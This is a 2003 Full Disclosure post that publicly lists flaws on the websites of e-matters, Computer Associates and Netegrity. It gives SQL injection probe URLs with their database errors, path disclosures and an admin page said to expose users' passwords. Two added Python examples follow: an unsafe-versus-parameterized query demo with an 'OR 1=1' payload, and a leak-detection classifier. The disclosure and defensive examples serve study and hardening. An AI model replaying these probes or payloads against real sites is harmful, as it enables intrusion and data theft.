Full Disclosure mailing list archives
@(#)Mordred Labs security notice - exploring the security companies
From: Sir Mordred <mordred () s-mail com>
Date: Wed, 07 May 2003 15:47:00 +0000
// @(#)Mordred Labs security notice 0x0002

Name: Exploring the security companies (part one)
Release date: May 7, 2003
Author: Sir Mordred (mordred () s-mail com)

I. INTRODUCTION

This is the first part of a security notice about security companies. I split the original notice because of the amount of information contained in it. The main topic of this notice is "bad coding habits"; next time maybe we will talk about security audits, and source code audits in particular. Also I should say: somehow I feel respect for people who are doing security and are brave enough to build a website with dynamic content, not just a couple of HTML pages. But sometimes a crazy thought crosses my mind: maybe it is just a dumb honeypot? :-)

The format for vulnerabilities is:

<number>) [hostname, the company name]
quotes, comments (if they exist)

* ISSUE <number> - description of the vulnerability
blank line
comments (if they exist)
blank line
the URL to demonstrate this vulnerability
blank line
the error message (if it exists)

II. DETAILS

Now let's begin with the rather interesting security company "e-matters"; a couple of minutes brings us several nice issues:

1) [ www.e-matters.de, e-matters ]

Though I do not understand German :-) it was very exciting to visit the e-matters website. I thought: well, Stefan Esser is out there, a respected security expert and PHP developer; now I am going to actually visit his company's website, and if I am lucky enough and the website has some dynamic content I may find something very interesting ... I will be changing URL parameters, putting in single quotes, commas and all such shit ... :-) Then I got interested in their flagship product, Webmail 3.0, as it has a demo account, and this brings us Issue 4. Well, it was real fun, I should say; have you ever seen a broken test.php page? I had not. How about a customers.html page? I think if I were going to buy some e-matters products, I'd run away from this site.

* ISSUE 1 - /customers.html page is broken

Somehow this page is very broken, and when you visit http://www.e-matters.de/customers.html you can see something like this:

Warning: mysql_pconnect(): Access denied for user: 'root@localhost' (Using password: YES) in /domains/e-matters.de/ftp/html/customers.html on line 17
Warning: mysql_select_db(): supplied argument is not a valid MySQL-Link resource in /domains/e-matters.de/ftp/html/customers.html on line 18
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in /domains/e-matters.de/ftp/html/customers.html on line 20
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /domains/e-matters.de/ftp/html/customers.html on line 21
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /domains/e-matters.de/ftp/html/customers.html on line 34

* ISSUE 2 - Path disclosure in /screenshotPopUp.html

http://www.e-matters.de/screenshotPopUp.html?INC=w&ID=1&

Warning: main(./screenshots/wwebmail.inc.php): failed to open stream: No such file or directory in /domains/e-matters.de/ftp/html/screenshotPopUp.html on line 15
Warning: main(): Failed opening './screenshots/w.inc.php' for inclusion (include_path='.:/usr/local/lib/php') in /domains/e-matters.de/ftp/html/screenshotPopUp.html on line 15

* ISSUE 3 - Path disclosure in /test.php page

http://webmail.e-matters.de/test.php

Parse error: parse error in /domains/e-matters.de/ftp/html/webmail/test.php on line 4

* ISSUE 4 - Admin access to webmail.e-matters.de interface

The URL http://webmail.e-matters.de/admin/ will happily display all users along with their passwords.

2) [ www.ca.com, Computer Associates ]

<quote>
CA is a $3 billion revenue enterprise software company, providing business-critical technology that serves as the backbone of commerce and shapes the way business is conducted throughout the world.
</quote>

* ISSUE 1 - SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1,'1&SOL=1&AR=&CP=

Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near ','.
/common/include/caADO.asp, line 243

* ISSUE 2 - Another SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1,1&AR=&CP=

Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near '1'.
/common/include/caADO.asp, line 243

* ISSUE 3 - Another SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1&AR=&CP=,'

Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near ','.
/common/include/caADO.asp, line 243

* ISSUE 4 - Yet another SQL injection in /quotes/quotelist.asp page

http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1&AR='88&CP=20099

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '88)) AND q.FKComp_ID = 20099 ORDER BY co.Comp_Name, Quotes_Date DESC'.
/common/include/caADO.asp, line 243

3) [ www.netegrity.com, Netegrity Inc. ]

<quote>
Netegrity, Inc. is a leading provider of security software solutions that securely manage identities and their access to enterprise information assets, letting business in while keeping risk out. Netegrity provides a comprehensive identity and access management product line for continuously evolving computing environments, including legacy, Web, and service-oriented architectures.
</quote>

* ISSUE 1 - SQL injection in /News/feature.cfm page

http://www.netegrity.com/News/feature.cfm?ArticleID=1,

ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near ','.
The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (24:1) to (24:55).
* ISSUE 2 - SQL injection in /News/PressRelease.cfm page

http://www.netegrity.com/News/PressRelease.cfm?ArticleId=1,1&leveltwo=PressReleases

ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 6: Incorrect syntax near ','.
The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (24:1) to (24:55).

* ISSUE 3 - Path disclosure

http://www.netegrity.com/News/PressRelease_Archive.cfm?levelthree=2000&release=nul

Cannot open CFML file
The requested file "C:\INETPUB\WWWROOT\2001\NEWS\ARCHIVE\DOM\2000\NUL.HTML" cannot be found.
The specific sequence of files included or processed is:
C:\INETPUB\WWWROOT\2001\NEWS\PRESSRELEASE_ARCHIVE.CFM
C:\INETPUB\WWWROOT\2001\NEWS\ARCHIVE\DOM\2000\NUL.HTML
CFInclude
The error occurred while processing an element with a general identifier of (CFINCLUDE), occupying document position (44:2) to (44:32).

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
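The pattern behind the quotelist.asp and feature.cfm errors, reproduced as an added example against an in-memory SQLite database. This is not code from the notice or from either vendor: the notice shows only the error output, so the table, column and parameter names below are hypothetical stand-ins. The unsafe function pastes AT, SOL and CP into the SQL text, so the notice's probes (a comma, a stray quote) produce a database syntax error whose text, like the CA Issue 4 message, echoes the rest of the query; the example goes one step past the notice's probes to show that a well-formed payload in the same slot returns rows the caller was never meant to see. The hardened form validates each value as an integer and binds it, so malformed input never reaches the database and there is no error text to leak.

```python
"""Added example, not from the notice: why pasting request parameters into
SQL text produces the errors quoted for quotelist.asp, and the hardened
form. The schema and parameter names are hypothetical stand-ins; the
notice never shows the vendors' server-side code."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a quotes table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE quotes (id INTEGER, sol INTEGER, comp_id INTEGER, txt TEXT)")
    conn.executemany(
        "INSERT INTO quotes VALUES (?, ?, ?, ?)",
        [(1, 1, 20099, "first"), (2, 1, 20099, "second"), (3, 2, 7, "third")])
    conn.commit()
    return conn


def quotelist_unsafe(conn: sqlite3.Connection, at: str, sol: str, cp: str) -> str:
    """The bad habit: AT, SOL and CP go straight into the SQL string.
    On success returns the matching rows; on failure returns the raw
    database error, which is what a page with verbose errors shows."""
    sql = (f"SELECT txt FROM quotes WHERE id = {at} AND sol = {sol} "
           f"AND comp_id = {cp} ORDER BY id")
    try:
        return ", ".join(row[0] for row in conn.execute(sql))
    except sqlite3.OperationalError as exc:
        # SQLite's message names the offending token, or echoes the unparsed
        # remainder of the statement after an unterminated quote, much as
        # SQL Server's "Unclosed quotation mark" message did in the notice.
        return f"DB error: {exc}"


def quotelist_safe(conn: sqlite3.Connection, at: str, sol: str, cp: str) -> str:
    """Hardened form: each value must parse as an integer, and values are
    bound as parameters rather than spliced into the statement. Bad input
    gets a generic reply and never touches the database."""
    try:
        params = [int(v) for v in (at, sol, cp)]
    except ValueError:
        return "Bad request"
    rows = conn.execute(
        "SELECT txt FROM quotes WHERE id = ? AND sol = ? AND comp_id = ? ORDER BY id",
        params)
    return ", ".join(row[0] for row in rows)


if __name__ == "__main__":
    db = make_db()
    for at in ("1", "1,'1", "1'", "1 OR 1=1"):
        print(f"AT={at!r:12} unsafe -> {quotelist_unsafe(db, at, '1', '20099')}")
        print(f"AT={at!r:12} safe   -> {quotelist_safe(db, at, '1', '20099')}")
```

The integer check is the real fix here: binding alone would already stop the injection, but rejecting non-numeric input before the query is built is what removes the error path entirely, and with it the leaked query text and file paths.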
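The other half of the notice's thesis is that every one of these pages answered a malformed request with the raw error text, which is how the author learned filesystem paths, a database account name, the query structure and the database product without any real exploitation. The classifier below is an added example, not code from the notice or from any of the named companies, for checking your own responses for the same leak patterns: its signatures are taken from the error texts quoted above, and those same texts are embedded as the sample inputs so it runs offline.

```python
"""Added example, not from the notice: offline classifier for the verbose
error output the notice reports. Signatures come from the quoted error
texts; SAMPLES re-uses those texts as test input."""
import re

# One (label, pattern) per error-page flavour quoted in the notice.
SIGNATURES = [
    ("mssql-error", re.compile(
        r"Microsoft OLE DB Provider for SQL Server error '[0-9A-Fa-f]+'")),
    ("odbc-error", re.compile(r"ODBC Error Code = \d+")),
    ("php-warning", re.compile(r"Warning: \w+\(")),
    ("php-parse-error", re.compile(r"Parse error:")),
    ("cfml-include-error", re.compile(r"Cannot open CFML file")),
]

# Filesystem paths an error page may echo: a Unix path of two or more
# segments whose first slash is not part of a URL's "://", or a Windows
# drive path.
PATH_RE = re.compile(
    r"(?<![:/])(?:/[\w.\-]+){2,}|[A-Za-z]:\\(?:[\w.\-]+\\)*[\w.\-]+")

# Single-value details worth flagging; each regex captures group "v".
EXTRACTORS = {
    "db_user": re.compile(r"Access denied for user: '(?P<v>[^']+)'"),
    "query_fragment": re.compile(
        r"Unclosed quotation mark before the character string '(?P<v>[^']*)'"),
    "near_token": re.compile(r"Incorrect syntax near '(?P<v>[^']*)'"),
}


def classify_leak(body: str) -> dict:
    """Classify one HTTP response body.

    Returns the matched error signatures, every filesystem path echoed in
    the body, the extracted details (None when absent) and a summary flag
    'leaking' that is True when any signature or path was found."""
    result = {
        "signatures": [label for label, rx in SIGNATURES if rx.search(body)],
        "paths": sorted(set(PATH_RE.findall(body))),
    }
    for key, rx in EXTRACTORS.items():
        match = rx.search(body)
        result[key] = match.group("v") if match else None
    result["leaking"] = bool(result["signatures"] or result["paths"])
    return result


# Sample bodies: the error texts quoted in the notice, plus one clean page.
SAMPLES = {
    "ca_issue4": (
        "Microsoft OLE DB Provider for SQL Server error '80040e14' "
        "Unclosed quotation mark before the character string "
        "'88)) AND q.FKComp_ID = 20099 ORDER BY co.Comp_Name, Quotes_Date DESC'. "
        "/common/include/caADO.asp, line 243"),
    "ematters_issue1": (
        "Warning: mysql_pconnect(): Access denied for user: 'root@localhost' "
        "(Using password: YES) in /domains/e-matters.de/ftp/html/customers.html "
        "on line 17"),
    "netegrity_issue1": (
        "ODBC Error Code = 37000 (Syntax error or access violation) "
        "[Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: "
        "Incorrect syntax near ','."),
    "netegrity_issue3": (
        r'Cannot open CFML file The requested file '
        r'"C:\INETPUB\WWWROOT\2001\NEWS\ARCHIVE\DOM\2000\NUL.HTML" cannot be found. '
        r'The specific sequence of files included or processed is: '
        r'C:\INETPUB\WWWROOT\2001\NEWS\PRESSRELEASE_ARCHIVE.CFM '
        r'C:\INETPUB\WWWROOT\2001\NEWS\ARCHIVE\DOM\2000\NUL.HTML'),
    "clean": "<html><body>Quote list: 2 quotes found.</body></html>",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        verdict = classify_leak(body)
        print(f"{name:17} leaking={verdict['leaking']!s:5} "
              f"signatures={verdict['signatures']} paths={verdict['paths']}")
```

Run against a crawl of your own site, a single hit on any signature is already a finding, independent of whether the input that triggered it can be turned into an injection: the path, the account name and the echoed SQL are the reconnaissance the notice was built from.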